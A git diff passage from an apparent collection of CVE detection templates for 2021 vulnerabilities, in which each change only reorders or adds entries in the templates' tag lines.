a/http/cves/2021/CVE-2021-32030.yaml b/http/cves/2021/CVE-2021-32030.yaml index 3f0bf5ec92..d478a248e4 100644 --- a/http/cves/2021/CVE-2021-32030.yaml +++ b/http/cves/2021/CVE-2021-32030.yaml @@ -26,7 +26,7 @@ info: max-request: 1 vendor: asus product: gt-ac2900_firmware - tags: cve,cve2021,asus,auth-bypass,router + tags: cve2021,cve,asus,auth-bypass,router http: - raw: diff --git a/http/cves/2021/CVE-2021-32172.yaml b/http/cves/2021/CVE-2021-32172.yaml index c4f7cb7bb9..6a6ed7bbda 100644 --- a/http/cves/2021/CVE-2021-32172.yaml +++ b/http/cves/2021/CVE-2021-32172.yaml @@ -27,7 +27,7 @@ info: max-request: 3 vendor: maianscriptworld product: maian_cart - tags: cve,cve2021,rce,unauth,maian,intrusive,maianscriptworld + tags: cve2021,cve,rce,unauth,maian,intrusive,maianscriptworld http: - raw: diff --git a/http/cves/2021/CVE-2021-32618.yaml b/http/cves/2021/CVE-2021-32618.yaml index 7899550a8e..dd27d5de8f 100644 --- a/http/cves/2021/CVE-2021-32618.yaml +++ b/http/cves/2021/CVE-2021-32618.yaml @@ -25,7 +25,7 @@ info: max-request: 1 vendor: flask-security_project product: flask-security - tags: cve,cve2021,redirect,flask,flask-security_project + tags: cve2021,cve,redirect,flask,flask-security_project http: - method: GET diff --git a/http/cves/2021/CVE-2021-32682.yaml b/http/cves/2021/CVE-2021-32682.yaml index 01b7f554f5..835f1cea86 100644 --- a/http/cves/2021/CVE-2021-32682.yaml +++ b/http/cves/2021/CVE-2021-32682.yaml @@ -27,7 +27,7 @@ info: vendor: std42 product: "elfinder" github: https://github.com/Studio-42/elFinder - tags: cve,cve2021,elfinder,misconfig,rce,oss,std42 + tags: cve2021,cve,elfinder,misconfig,rce,oss,std42 http: - method: GET diff --git a/http/cves/2021/CVE-2021-32789.yaml b/http/cves/2021/CVE-2021-32789.yaml index 92a084ac9e..0e71169b41 100644 --- a/http/cves/2021/CVE-2021-32789.yaml +++ b/http/cves/2021/CVE-2021-32789.yaml @@ -29,7 +29,7 @@ info: vendor: automattic product: woocommerce_blocks framework: wordpress - tags: cve,cve2021,wordpress,woocommerce,sqli,wp-plugin,wp,wpscan,automattic + tags: cve2021,cve,wordpress,woocommerce,sqli,wp-plugin,wp,wpscan,automattic http: - method: GET diff --git a/http/cves/2021/CVE-2021-32819.yaml b/http/cves/2021/CVE-2021-32819.yaml index 2b30f83196..5327427ff1 100644 --- a/http/cves/2021/CVE-2021-32819.yaml +++ b/http/cves/2021/CVE-2021-32819.yaml @@ -28,7 +28,7 @@ info: max-request: 1 vendor: squirrelly product: squirrelly - tags: cve,cve2021,nodejs,rce,oast,squirrelly + tags: cve2021,cve,nodejs,rce,oast,squirrelly http: - method: GET diff --git a/http/cves/2021/CVE-2021-32820.yaml b/http/cves/2021/CVE-2021-32820.yaml index 82c3a296f8..36c543042e 100644 --- a/http/cves/2021/CVE-2021-32820.yaml +++ b/http/cves/2021/CVE-2021-32820.yaml @@ -28,7 +28,7 @@ info: vendor: express_handlebars_project product: express_handlebars framework: node.js - tags: cve,cve2021,expressjs,lfi,xxe,express_handlebars_project,node.js + tags: cve2021,cve,expressjs,lfi,xxe,express_handlebars_project,node.js http: - method: GET diff --git a/http/cves/2021/CVE-2021-32853.yaml b/http/cves/2021/CVE-2021-32853.yaml index 4d5714e3cd..6c714948f6 100644 --- a/http/cves/2021/CVE-2021-32853.yaml +++ b/http/cves/2021/CVE-2021-32853.yaml @@ -27,7 +27,7 @@ info: vendor: erxes product: erxes shodan-query: http.title:"erxes" - tags: cve,cve2021,xss,erxes,oss + tags: cve2021,cve,xss,erxes,oss http: - method: GET diff --git a/http/cves/2021/CVE-2021-3293.yaml b/http/cves/2021/CVE-2021-3293.yaml index cf744fc8e7..f952babfc1 100644 --- a/http/cves/2021/CVE-2021-3293.yaml +++ b/http/cves/2021/CVE-2021-3293.yaml @@ -25,7 +25,7 @@ info: max-request: 1 vendor: emlog product: emlog - tags: cve,cve2021,emlog,fpd + tags: cve2021,cve,emlog,fpd http: - raw: diff --git a/http/cves/2021/CVE-2021-33044.yaml b/http/cves/2021/CVE-2021-33044.yaml index a8395d69f9..d86b884299 100644 --- a/http/cves/2021/CVE-2021-33044.yaml +++ b/http/cves/2021/CVE-2021-33044.yaml @@ -26,7 +26,7 @@ info: max-request: 1 vendor: dahuasecurity product: ipc-hum7xxx_firmware - tags: dahua,cve,cve2021,auth-bypass,seclists,dahuasecurity + tags: cve2021,cve,dahua,auth-bypass,seclists,dahuasecurity http: - raw: diff --git a/http/cves/2021/CVE-2021-33221.yaml b/http/cves/2021/CVE-2021-33221.yaml index e4bf9a8738..4b6b4fa59b 100644 --- a/http/cves/2021/CVE-2021-33221.yaml +++ b/http/cves/2021/CVE-2021-33221.yaml @@ -26,7 +26,7 @@ info: max-request: 1 vendor: commscope product: ruckus_iot_controller - tags: cve2021,commscope,ruckus,debug,service,leak,seclists,cve + tags: cve2021,cve,commscope,ruckus,debug,service,leak,seclists http: - method: GET diff --git a/http/cves/2021/CVE-2021-33357.yaml b/http/cves/2021/CVE-2021-33357.yaml index ebbabdfee8..bca16b8fd3 100644 --- a/http/cves/2021/CVE-2021-33357.yaml +++ b/http/cves/2021/CVE-2021-33357.yaml @@ -27,7 +27,7 @@ info: max-request: 1 vendor: raspap product: raspap - tags: cve,cve2021,rce,raspap,oast + tags: cve2021,cve,rce,raspap,oast http: - method: GET diff --git a/http/cves/2021/CVE-2021-33544.yaml b/http/cves/2021/CVE-2021-33544.yaml index be25bfe7f0..428b7e048e 100644 --- a/http/cves/2021/CVE-2021-33544.yaml +++ b/http/cves/2021/CVE-2021-33544.yaml @@ -26,7 +26,7 @@ info: max-request: 1 vendor: geutebrueck product: g-cam_ebc-2110 - tags: cve,cve2021,geutebruck,rce,oast,geutebrueck + tags: cve2021,cve,geutebruck,rce,oast,geutebrueck http: - raw: diff --git a/http/cves/2021/CVE-2021-33564.yaml b/http/cves/2021/CVE-2021-33564.yaml index 863e8c8cb2..d757b8d148 100644 --- a/http/cves/2021/CVE-2021-33564.yaml +++ b/http/cves/2021/CVE-2021-33564.yaml @@ -28,7 +28,7 @@ info: vendor: dragonfly_project product: dragonfly framework: ruby - tags: cve,cve2021,rce,ruby,injection,dragonfly_project + tags: cve2021,cve,rce,ruby,injection,dragonfly_project http: - method: GET diff --git a/http/cves/2021/CVE-2021-33690.yaml b/http/cves/2021/CVE-2021-33690.yaml index 2af06e6db1..330a66819c 100644 --- a/http/cves/2021/CVE-2021-33690.yaml +++ b/http/cves/2021/CVE-2021-33690.yaml @@ -26,7 +26,7 @@ info: vendor: sap product: netweaver_development_infrastructure shodan-query: html:"SAP NetWeaver" - tags: cve,cve2021,oast,ssrf,sap + tags: cve2021,cve,oast,ssrf,sap http: - raw: diff --git a/http/cves/2021/CVE-2021-3374.yaml b/http/cves/2021/CVE-2021-3374.yaml index 6a0582cd0a..dc1192b2c9 100644 --- a/http/cves/2021/CVE-2021-3374.yaml +++ b/http/cves/2021/CVE-2021-3374.yaml @@ -25,7 +25,7 @@ info: max-request: 2 vendor: rstudio product: shiny_server - tags: cve,cve2021,rstudio,traversal + tags: cve2021,cve,rstudio,traversal http: - method: GET diff --git a/http/cves/2021/CVE-2021-3377.yaml b/http/cves/2021/CVE-2021-3377.yaml index d5583f09f3..ff6e00efed 100644 --- a/http/cves/2021/CVE-2021-3377.yaml +++ b/http/cves/2021/CVE-2021-3377.yaml @@ -25,7 +25,7 @@ info: vendor: ansi_up_project product: ansi_up framework: node.js - tags: cve,cve2021,xss,npm,ansi_up_project,node.js + tags: cve2021,cve,xss,npm,ansi_up_project,node.js http: - raw: diff --git a/http/cves/2021/CVE-2021-3378.yaml b/http/cves/2021/CVE-2021-3378.yaml index 6b03b6db65..37d24bf853 100644 --- a/http/cves/2021/CVE-2021-3378.yaml +++ b/http/cves/2021/CVE-2021-3378.yaml @@ -27,7 +27,7 @@ info: max-request: 2 vendor: fortilogger product: fortilogger - tags: fortilogger,fortigate,fortinet,packetstorm,cve,cve2021,fileupload,intrusive + tags: cve,cve2021,fortilogger,fortigate,fortinet,packetstorm,fileupload,intrusive http: - raw: diff --git a/http/cves/2021/CVE-2021-33807.yaml b/http/cves/2021/CVE-2021-33807.yaml index fde34ca53a..95115f76fb 100644 --- a/http/cves/2021/CVE-2021-33807.yaml +++ b/http/cves/2021/CVE-2021-33807.yaml @@ -27,7 +27,7 @@ info: max-request: 1 vendor: gespage product: gespage - tags: cve,cve2021,lfi,gespage + tags: cve2021,cve,lfi,gespage http: - method: GET diff --git a/http/cves/2021/CVE-2021-33851.yaml b/http/cves/2021/CVE-2021-33851.yaml index c7a03c12b0..e28b3d2ad7 100644 --- a/http/cves/2021/CVE-2021-33851.yaml +++ b/http/cves/2021/CVE-2021-33851.yaml @@ -29,7 +29,7 @@ info: vendor: apasionados product: customize_login_image framework: wordpress - tags: wpscan,cve2021,wordpress,customize-login-image,wp,authenticated,cve,wp-plugin,xss,apasionados + tags: cve,cve2021,wpscan,wordpress,customize-login-image,wp,authenticated,wp-plugin,xss,apasionados http: - raw: diff --git a/http/cves/2021/CVE-2021-33904.yaml b/http/cves/2021/CVE-2021-33904.yaml index 2e779e9b34..0a58a92ab3 100644 --- a/http/cves/2021/CVE-2021-33904.yaml +++ b/http/cves/2021/CVE-2021-33904.yaml @@ -26,7 +26,7 @@ info: max-request: 1 vendor: accela product: civic_platform - tags: cve2021,accela,xss,edb,packetstorm,cve + tags: cve,cve2021,accela,xss,edb,packetstorm http: - method: GET diff --git a/http/cves/2021/CVE-2021-34370.yaml b/http/cves/2021/CVE-2021-34370.yaml index 873a80f3d9..4c24aac435 100644 --- a/http/cves/2021/CVE-2021-34370.yaml +++ b/http/cves/2021/CVE-2021-34370.yaml @@ -26,7 +26,7 @@ info: max-request: 1 vendor: accela product: civic_platform - tags: xss,redirect,cve,cve2021,accela,edb + tags: cve,cve2021,xss,redirect,accela,edb http: - method: GET diff --git a/http/cves/2021/CVE-2021-34429.yaml b/http/cves/2021/CVE-2021-34429.yaml index 6cb9424fe3..543d394555 100644 --- a/http/cves/2021/CVE-2021-34429.yaml +++ b/http/cves/2021/CVE-2021-34429.yaml @@ -28,7 +28,7 @@ info: max-request: 2 vendor: eclipse product: jetty - tags: cve,cve2021,jetty,eclipse + tags: cve2021,cve,jetty,eclipse http: - raw: diff --git a/http/cves/2021/CVE-2021-34473.yaml b/http/cves/2021/CVE-2021-34473.yaml index 7b02dc9c10..c5dfb26443 100644 --- a/http/cves/2021/CVE-2021-34473.yaml +++ b/http/cves/2021/CVE-2021-34473.yaml @@ -27,7 +27,7 @@ info: max-request: 2 vendor: microsoft product: exchange_server - tags: cve,cve2021,ssrf,rce,exchange,kev,microsoft + tags: cve2021,cve,ssrf,rce,exchange,kev,microsoft http: - method: GET diff --git a/http/cves/2021/CVE-2021-34621.yaml b/http/cves/2021/CVE-2021-34621.yaml index 564ff97e36..dda3abe2c3 100644 --- a/http/cves/2021/CVE-2021-34621.yaml +++ b/http/cves/2021/CVE-2021-34621.yaml @@ -27,7 +27,7 @@ info: vendor: properfraction product: profilepress framework: wordpress - tags: wordpress,wp-plugin,packetstorm,cve,cve2021,intrusive,properfraction + tags: cve2021,cve,wordpress,wp-plugin,packetstorm,intrusive,properfraction http: - raw: diff --git a/http/cves/2021/CVE-2021-34640.yaml b/http/cves/2021/CVE-2021-34640.yaml index ea00604f64..0874b7967f 100644 --- a/http/cves/2021/CVE-2021-34640.yaml +++ b/http/cves/2021/CVE-2021-34640.yaml @@ -27,7 +27,7 @@ info: vendor: securimage-wp-fixed_project product: securimage-wp-fixed framework: wordpress - tags: wpscan,wordpress,cve,cve2021,wp-plugin,authenticated,securimage-wp-fixed_project + tags: cve2021,cve,wpscan,wordpress,wp-plugin,authenticated,securimage-wp-fixed_project http: - raw: diff --git a/http/cves/2021/CVE-2021-34643.yaml b/http/cves/2021/CVE-2021-34643.yaml index 42c1b77065..0154b73bfe 100644 --- a/http/cves/2021/CVE-2021-34643.yaml +++ b/http/cves/2021/CVE-2021-34643.yaml @@ -27,7 +27,7 @@ info: vendor: skaut-bazar_project product: skaut-bazar framework: wordpress - tags: wpscan,wordpress,cve,cve2021,wp-plugin,authenticated,skaut-bazar_project + tags: cve2021,cve,wpscan,wordpress,wp-plugin,authenticated,skaut-bazar_project,xss http: - raw: diff --git a/http/cves/2021/CVE-2021-34805.yaml b/http/cves/2021/CVE-2021-34805.yaml index 638859e6a9..599ee02939 100644 --- a/http/cves/2021/CVE-2021-34805.yaml +++ b/http/cves/2021/CVE-2021-34805.yaml @@ -26,7 +26,7 @@ info: max-request: 1 vendor: land-software product: faust_iserver - tags: lfi,packetstorm,cve,cve2021,faust,iserver,land-software + tags: cve2021,cve,lfi,packetstorm,faust,iserver,land-software http: - method: GET diff --git a/http/cves/2021/CVE-2021-35250.yaml b/http/cves/2021/CVE-2021-35250.yaml index 3cd335e1af..c23a7b5b15 100644 --- a/http/cves/2021/CVE-2021-35250.yaml +++ b/http/cves/2021/CVE-2021-35250.yaml @@ -28,7 +28,7 @@ info: vendor: solarwinds product: serv-u shodan-query: product:"Rhinosoft Serv-U httpd" - tags: cve,cve2021,solarwinds,traversal + tags: cve2021,cve,solarwinds,traversal http: - raw: diff --git a/http/cves/2021/CVE-2021-35265.yaml b/http/cves/2021/CVE-2021-35265.yaml index 3a08d5cbc2..2570ec9472 100644 --- a/http/cves/2021/CVE-2021-35265.yaml +++ b/http/cves/2021/CVE-2021-35265.yaml @@ -27,7 +27,7 @@ info: vendor: maxsite product: maxsite_cms shodan-query: html:'content="MaxSite CMS' - tags: cve,cve2021,maxsite,xss + tags: cve2021,cve,maxsite,xss http: - method: GET diff --git a/http/cves/2021/CVE-2021-35323.yaml b/http/cves/2021/CVE-2021-35323.yaml index fdbd7c11ae..a004fa3d5c 100644 --- a/http/cves/2021/CVE-2021-35323.yaml +++ b/http/cves/2021/CVE-2021-35323.yaml @@ -24,7 +24,7 @@ info: vendor: bludit product: bludit shodan-query: title:"Bludit" - tags: cve,cve2021,bludit,xss + tags: cve2021,cve,bludit,xss http: - raw: diff --git a/http/cves/2021/CVE-2021-35336.yaml b/http/cves/2021/CVE-2021-35336.yaml index e627033b92..86bd4dcb69 100644 --- a/http/cves/2021/CVE-2021-35336.yaml +++ b/http/cves/2021/CVE-2021-35336.yaml @@ -24,7 +24,7 @@ info: max-request: 1 vendor: tieline product: ip_audtio_gateway_firmware - tags: cve,cve2021,tieline,default-login + tags: cve2021,cve,tieline,default-login http: - method: GET diff --git a/http/cves/2021/CVE-2021-35380.yaml b/http/cves/2021/CVE-2021-35380.yaml index cbd46896a2..a26262bb88 100644 --- a/http/cves/2021/CVE-2021-35380.yaml +++ b/http/cves/2021/CVE-2021-35380.yaml @@ -27,7 +27,7 @@ info: max-request: 1 vendor: solari product: termtalk_server - tags: cve,cve2021,termtalk,lfi,unauth,lfr,edb,solari + tags: cve2021,cve,termtalk,lfi,unauth,lfr,edb,solari http: - method: GET diff --git a/http/cves/2021/CVE-2021-35395.yaml b/http/cves/2021/CVE-2021-35395.yaml index e45a528070..e86df31e29 100644 --- a/http/cves/2021/CVE-2021-35395.yaml +++ b/http/cves/2021/CVE-2021-35395.yaml @@ -23,7 +23,7 @@ info: max-request: 1 vendor: realtek product: realtek_jungle_sdk - tags: cve,cve2021,realtek,rce,kev + tags: cve2021,cve,realtek,rce,kev http: - raw: diff --git a/http/cves/2021/CVE-2021-35464.yaml b/http/cves/2021/CVE-2021-35464.yaml index 189acf310a..b8b8f73498 100644 --- a/http/cves/2021/CVE-2021-35464.yaml +++ b/http/cves/2021/CVE-2021-35464.yaml @@ -32,7 +32,7 @@ info: vendor: forgerock product: am shodan-query: http.title:"OpenAM" - tags: packetstorm,cve,cve2021,openam,rce,java,kev,forgerock + tags: cve,cve2021,packetstorm,openam,rce,java,kev,forgerock http: - method: GET diff --git a/http/cves/2021/CVE-2021-35488.yaml b/http/cves/2021/CVE-2021-35488.yaml index 66a7dd9af7..16cb43392f 100644 --- a/http/cves/2021/CVE-2021-35488.yaml +++ b/http/cves/2021/CVE-2021-35488.yaml @@ -28,7 +28,7 @@ info: vendor: thruk product: thruk shodan-query: http.html:"Thruk" - tags: cve,cve2021,thruk,xss + tags: cve2021,cve,thruk,xss http: - method: GET diff --git a/http/cves/2021/CVE-2021-35587.yaml b/http/cves/2021/CVE-2021-35587.yaml index c192ed8efb..8a632d1528 100644 --- a/http/cves/2021/CVE-2021-35587.yaml +++ b/http/cves/2021/CVE-2021-35587.yaml @@ -29,7 +29,7 @@ info: product: access_manager shodan-query: http.title:"Oracle Access Management" fofa-query: body="/oam/pages/css/login_page.css" - tags: cve,cve2021,oam,rce,java,unauth,oracle,kev + tags: cve2021,cve,oam,rce,java,unauth,oracle,kev http: - method: GET diff --git a/http/cves/2021/CVE-2021-3577.yaml b/http/cves/2021/CVE-2021-3577.yaml index d979655e90..9982e268f7 100644 --- a/http/cves/2021/CVE-2021-3577.yaml +++ b/http/cves/2021/CVE-2021-3577.yaml @@ -25,7 +25,7 @@ info: max-request: 1 vendor: binatoneglobal product: halo\+_camera_firmware - tags: cve,cve2021,rce,oast,motorola,iot,binatoneglobal + tags: cve2021,cve,rce,oast,motorola,iot,binatoneglobal http: - raw: diff --git a/http/cves/2021/CVE-2021-36260.yaml b/http/cves/2021/CVE-2021-36260.yaml index b77ab1e4b0..ecc50529b7 100644 --- a/http/cves/2021/CVE-2021-36260.yaml +++ b/http/cves/2021/CVE-2021-36260.yaml @@ -28,7 +28,7 @@ info: vendor: hikvision product: ds-2cd2026g2-iu\/sl_firmware shodan-query: http.favicon.hash:999357577 - tags: cve,cve2021,hikvision,rce,iot,intrusive,kev + tags: cve2021,cve,hikvision,rce,iot,intrusive,kev http: - raw: diff --git a/http/cves/2021/CVE-2021-36356.yaml b/http/cves/2021/CVE-2021-36356.yaml index 33db0f79e7..2efe15586d 100644 --- a/http/cves/2021/CVE-2021-36356.yaml +++ b/http/cves/2021/CVE-2021-36356.yaml @@ -24,7 +24,7 @@ info: max-request: 2 vendor: kramerav product: viaware - tags: viaware,cve,cve2021,kramer,edb,rce,intrusive,kramerav + tags: cve2021,cve,viaware,kramer,edb,rce,intrusive,kramerav variables: useragent: "{{rand_base(6)}}" diff --git a/http/cves/2021/CVE-2021-36380.yaml b/http/cves/2021/CVE-2021-36380.yaml index 47fb93397a..da79fda839 100644 --- a/http/cves/2021/CVE-2021-36380.yaml +++ b/http/cves/2021/CVE-2021-36380.yaml @@ -25,7 +25,7 @@ info: max-request: 1 vendor: sunhillo product: sureline - tags: cve,cve2021,sureline,rce,oast,sunhillo + tags: cve2021,cve,sureline,rce,oast,sunhillo http: - raw: diff --git a/http/cves/2021/CVE-2021-36450.yaml b/http/cves/2021/CVE-2021-36450.yaml index 0c8f245e85..83d0c404bd 100644 --- a/http/cves/2021/CVE-2021-36450.yaml +++ b/http/cves/2021/CVE-2021-36450.yaml @@ -29,7 +29,7 @@ info: vendor: verint product: workforce_optimization shodan-query: title:"Verint Sign-in" - tags: cve,cve2021,xss,verint + tags: cve2021,cve,xss,verint http: - raw: diff --git a/http/cves/2021/CVE-2021-3654.yaml b/http/cves/2021/CVE-2021-3654.yaml index 22f679e4c7..ea418d926a 100644 --- a/http/cves/2021/CVE-2021-3654.yaml +++ b/http/cves/2021/CVE-2021-3654.yaml @@ -27,7 +27,7 @@ info: max-request: 1 vendor: openstack product: nova - tags: redirect,novnc,cve,cve2021,seclists,openstack + tags: cve2021,cve,redirect,novnc,seclists,openstack http: - method: GET diff --git a/http/cves/2021/CVE-2021-36580.yaml b/http/cves/2021/CVE-2021-36580.yaml index a853cabdc8..2ef68e0d21 100644 --- a/http/cves/2021/CVE-2021-36580.yaml +++ b/http/cves/2021/CVE-2021-36580.yaml @@ -30,7 +30,7 @@ info: vendor: icewarp product: icewarp_server shodan-query: title:"icewarp" - tags: cve,cve2021,icewarp,redirect + tags: cve2021,cve,icewarp,redirect http: - method: GET diff --git a/http/cves/2021/CVE-2021-36748.yaml b/http/cves/2021/CVE-2021-36748.yaml index 026400e007..b916de59f1 100644 --- a/http/cves/2021/CVE-2021-36748.yaml +++ b/http/cves/2021/CVE-2021-36748.yaml @@ -27,7 +27,7 @@ info: vendor: prestahome product: blog framework: prestashop - tags: cve,cve2021,prestashop,prestahome,sqli,cms + tags: cve2021,cve,prestashop,prestahome,sqli,cms http: - raw: diff --git a/http/cves/2021/CVE-2021-36749.yaml b/http/cves/2021/CVE-2021-36749.yaml index 6f3fab77db..20dfb7e3de 100644 --- a/http/cves/2021/CVE-2021-36749.yaml +++ b/http/cves/2021/CVE-2021-36749.yaml @@ -27,7 +27,7 @@ info: max-request: 1 vendor: apache product: druid - tags: cve,cve2021,apache,lfi,auth-bypass,druid + tags: cve2021,cve,apache,lfi,auth-bypass,druid http: - raw: diff --git a/http/cves/2021/CVE-2021-36873.yaml b/http/cves/2021/CVE-2021-36873.yaml index 6e1760953c..157d422da6 100644 --- a/http/cves/2021/CVE-2021-36873.yaml +++ b/http/cves/2021/CVE-2021-36873.yaml @@ -28,7 +28,7 @@ info: vendor: webence product: iq_block_country framework: wordpress - tags: cve,wp-plugin,iq-block-country,cve2021,wordpress,wp,xss,authenticated,wpscan,webence + tags: cve,cve2021,wp-plugin,iq-block-country,wordpress,wp,xss,authenticated,wpscan,webence http: - raw: diff --git a/http/cves/2021/CVE-2021-37304.yaml b/http/cves/2021/CVE-2021-37304.yaml index 28e7d10b45..8937fbee8a 100644 --- a/http/cves/2021/CVE-2021-37304.yaml +++ b/http/cves/2021/CVE-2021-37304.yaml @@ -28,7 +28,7 @@ info: product: jeecg shodan-query: title:"Jeecg-Boot" fofa-query: title="JeecgBoot 企业级低代码平台" - tags: cve,cve2021,jeecg,exposure + tags: cve2021,cve,jeecg,exposure http: - method: GET diff --git a/http/cves/2021/CVE-2021-37305.yaml b/http/cves/2021/CVE-2021-37305.yaml index 02d20cff74..6f42b7e7e5 100644 --- a/http/cves/2021/CVE-2021-37305.yaml +++ b/http/cves/2021/CVE-2021-37305.yaml @@ -28,7 +28,7 @@ info: product: jeecg shodan-query: title:"Jeecg-Boot" fofa-query: title="JeecgBoot 企业级低代码平台" - tags: cve,cve2021,jeecg,exposure + tags: cve2021,cve,jeecg,exposure http: - method: GET diff --git a/http/cves/2021/CVE-2021-37416.yaml b/http/cves/2021/CVE-2021-37416.yaml index 131d54048c..ba5a9a500c 100644 --- a/http/cves/2021/CVE-2021-37416.yaml +++ b/http/cves/2021/CVE-2021-37416.yaml @@ -27,7 +27,7 @@ info: vendor: zohocorp product: manageengine_adselfservice_plus shodan-query: http.title:"ManageEngine" - tags: cve,cve2021,zoho,xss,zohocorp + tags: cve2021,cve,zoho,xss,zohocorp http: - method: GET diff --git a/http/cves/2021/CVE-2021-37538.yaml b/http/cves/2021/CVE-2021-37538.yaml index bf5406bb87..c43268400a 100644 --- a/http/cves/2021/CVE-2021-37538.yaml +++ b/http/cves/2021/CVE-2021-37538.yaml @@ -26,7 +26,7 @@ info: vendor: smartdatasoft product: smartblog framework: prestashop - tags: cve,cve2021,prestashop,smartblog,sqli,smartdatasoft + tags: cve2021,cve,prestashop,smartblog,sqli,smartdatasoft http: - method: GET diff --git a/http/cves/2021/CVE-2021-37573.yaml b/http/cves/2021/CVE-2021-37573.yaml index 8355c00d5a..c700efc1ac 100644 --- a/http/cves/2021/CVE-2021-37573.yaml +++ b/http/cves/2021/CVE-2021-37573.yaml @@ -26,7 +26,7 @@ info: max-request: 1 vendor: tiny_java_web_server_project product: tiny_java_web_server - tags: cve,cve2021,xss,tjws,java,seclists,tiny_java_web_server_project + tags: cve2021,cve,xss,tjws,java,seclists,tiny_java_web_server_project http: - method: GET diff --git a/http/cves/2021/CVE-2021-37580.yaml b/http/cves/2021/CVE-2021-37580.yaml index e7fb53de92..8709af48a8 100644 --- a/http/cves/2021/CVE-2021-37580.yaml +++ b/http/cves/2021/CVE-2021-37580.yaml @@ -26,7 +26,7 @@ info: max-request: 1 vendor: apache product: shenyu - tags: cve,cve2021,apache,jwt,shenyu + tags: cve2021,cve,apache,jwt,shenyu http: - raw: diff --git a/http/cves/2021/CVE-2021-37704.yaml b/http/cves/2021/CVE-2021-37704.yaml index 789775bc50..691e0c76df 100644 --- a/http/cves/2021/CVE-2021-37704.yaml +++ b/http/cves/2021/CVE-2021-37704.yaml @@ -27,7 +27,7 @@ info: max-request: 2 vendor: phpfastcache product: phpfastcache - tags: cve,cve2021,exposure,phpfastcache,phpinfo,phpsocialnetwork + tags: cve2021,cve,exposure,phpfastcache,phpinfo,phpsocialnetwork http: - method: GET diff --git a/http/cves/2021/CVE-2021-37833.yaml b/http/cves/2021/CVE-2021-37833.yaml index 6a6615ba4c..1a6310cf19 100644 --- a/http/cves/2021/CVE-2021-37833.yaml +++ b/http/cves/2021/CVE-2021-37833.yaml @@ -25,7 +25,7 @@ info: max-request: 4 vendor: digitaldruid product: hoteldruid - tags: cve,cve2021,hoteldruid,xss,digitaldruid + tags: cve2021,cve,hoteldruid,xss,digitaldruid http: - method: GET diff --git a/http/cves/2021/CVE-2021-38314.yaml b/http/cves/2021/CVE-2021-38314.yaml index 00c1eedd96..5da131e262 100644 --- a/http/cves/2021/CVE-2021-38314.yaml +++ b/http/cves/2021/CVE-2021-38314.yaml @@ -27,7 +27,7 @@ info: vendor: redux product: gutenberg_template_library_\&_redux_framework framework: wordpress - tags: cve,cve2021,wordpress,wp-plugin,redux + tags: cve2021,cve,wordpress,wp-plugin,redux http: - raw: diff --git a/http/cves/2021/CVE-2021-38540.yaml b/http/cves/2021/CVE-2021-38540.yaml index 5e6ff91269..e4cc0f1307 100644 --- a/http/cves/2021/CVE-2021-38540.yaml +++ b/http/cves/2021/CVE-2021-38540.yaml @@ -27,7 +27,7 @@ info: vendor: apache product: airflow shodan-query: title:"Sign In - Airflow" - tags: cve,cve2021,apache,airflow,rce,intrusive + tags: cve2021,cve,apache,airflow,rce,intrusive http: - raw: diff --git a/http/cves/2021/CVE-2021-38647.yaml b/http/cves/2021/CVE-2021-38647.yaml index 1fdc547ef5..bee9a17af3 100644 --- a/http/cves/2021/CVE-2021-38647.yaml +++ b/http/cves/2021/CVE-2021-38647.yaml @@ -26,7 +26,7 @@ info: max-request: 1 vendor: microsoft product: azure_automation_state_configuration - tags: cve,cve2021,rce,omi,microsoft,kev + tags: cve2021,cve,rce,omi,microsoft,kev http: - raw: diff --git a/http/cves/2021/CVE-2021-38702.yaml b/http/cves/2021/CVE-2021-38702.yaml index cc2d6fd28b..86e2630599 100644 --- a/http/cves/2021/CVE-2021-38702.yaml +++ b/http/cves/2021/CVE-2021-38702.yaml @@ -26,7 +26,7 @@ info: max-request: 1 vendor: cyberoamworks product: netgenie_c0101b1-20141120-ng11vo_firmware - tags: cyberoam,netgenie,xss,router,seclists,cve,packetstorm,cve2021,cyberoamworks + tags: cve2021,cve,cyberoam,netgenie,xss,router,seclists,packetstorm,cyberoamworks http: - method: GET diff --git a/http/cves/2021/CVE-2021-38704.yaml b/http/cves/2021/CVE-2021-38704.yaml index 395b559e80..55490ebb8a 100644 --- a/http/cves/2021/CVE-2021-38704.yaml +++ b/http/cves/2021/CVE-2021-38704.yaml @@ -26,7 +26,7 @@ info: vendor: cliniccases product: cliniccases shodan-query: http.title:"ClinicCases",html:"/cliniccases/" - tags: xss,cve,cve2021,cliniccases + tags: cve,cve2021,xss,cliniccases http: - method: GET diff --git a/http/cves/2021/CVE-2021-38751.yaml b/http/cves/2021/CVE-2021-38751.yaml index feaa3038bc..bd0e6f444c 100644 --- a/http/cves/2021/CVE-2021-38751.yaml +++ b/http/cves/2021/CVE-2021-38751.yaml @@ -25,7 +25,7 @@ info: max-request: 1 vendor: exponentcms product: exponentcms - tags: cve,cve2021,exponentcms + tags: cve2021,cve,exponentcms http: - method: GET diff --git a/http/cves/2021/CVE-2021-39144.yaml b/http/cves/2021/CVE-2021-39144.yaml index ef0c2c037b..7b7fbf00d4 100644 --- a/http/cves/2021/CVE-2021-39144.yaml +++ b/http/cves/2021/CVE-2021-39144.yaml @@ -28,7 +28,7 @@ info: max-request: 1 vendor: xstream_project product: xstream - tags: cve,cve2021,xstream,deserialization,rce,kev,xstream_project + tags: cve2021,cve,xstream,deserialization,rce,kev,xstream_project http: - raw: diff --git a/http/cves/2021/CVE-2021-39146.yaml b/http/cves/2021/CVE-2021-39146.yaml index 7507dc3359..996c0ba840 100644 --- a/http/cves/2021/CVE-2021-39146.yaml +++ b/http/cves/2021/CVE-2021-39146.yaml @@ -28,7 +28,7 @@ info: max-request: 1 vendor: xstream_project product: xstream - tags: cve,cve2021,xstream,deserialization,rce,xstream_project + tags: cve2021,cve,xstream,deserialization,rce,xstream_project http: - raw: diff --git a/http/cves/2021/CVE-2021-39152.yaml b/http/cves/2021/CVE-2021-39152.yaml index bd07289774..283e8d22b0 100644 --- a/http/cves/2021/CVE-2021-39152.yaml +++ b/http/cves/2021/CVE-2021-39152.yaml @@ -28,7 +28,7 @@ info: max-request: 1 vendor: xstream_project product: xstream - tags: cve,cve2021,xstream,ssrf,oast,xstream_project + tags: cve2021,cve,xstream,ssrf,oast,xstream_project http: - raw: diff --git a/http/cves/2021/CVE-2021-39226.yaml b/http/cves/2021/CVE-2021-39226.yaml index 48ff542621..868a09d1f2 100644 --- a/http/cves/2021/CVE-2021-39226.yaml +++ b/http/cves/2021/CVE-2021-39226.yaml @@ -27,7 +27,7 @@ info: vendor: grafana product: grafana shodan-query: title:"Grafana" - tags: cve,cve2021,grafana,kev + tags: cve2021,cve,grafana,kev http: - method: GET diff --git 